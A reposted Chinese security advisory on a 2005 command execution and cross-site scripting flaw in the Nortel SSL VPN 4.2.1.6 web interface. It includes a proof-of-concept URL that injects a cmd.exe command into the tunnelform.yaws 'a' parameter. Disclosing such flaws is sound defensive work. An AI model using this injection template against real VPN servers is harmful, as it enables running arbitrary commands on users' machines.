Nortel SSL VPN跨站脚本/命令执行漏洞

发布日期：2005-12-12
更新日期：2005-12-12

受影响系统：

Nortel Networks SSL VPN 4.2.1.6

描述：

---

BUGTRAQ ID: 15798

Nortel SSL VPN是远程访问安全解决方案，允许使用安全套接字层（SSL）做为基础安全协议。

Nortel的SSL VPN的WEB界面没有充分的验证用户输入，因此攻击者可以在某些页面的链接中隐藏命令。

由于从这些页面中所调用的Java Applet是经过加密签名的，因此可能以使用浏览器用户的权限执行任意系统命令。

<*来源：Daniel Fabian （d.fabian@sec-consult.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113443024722657&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

https://SSL_VPN_SERVER/tunnelform.yaws?a= cmd.exe /c echo test >
c:\\test.txt &type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&
0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start...

建议：

---

厂商补丁：

Nortel Networks
---------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.nortelnetworks.com/index.html

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有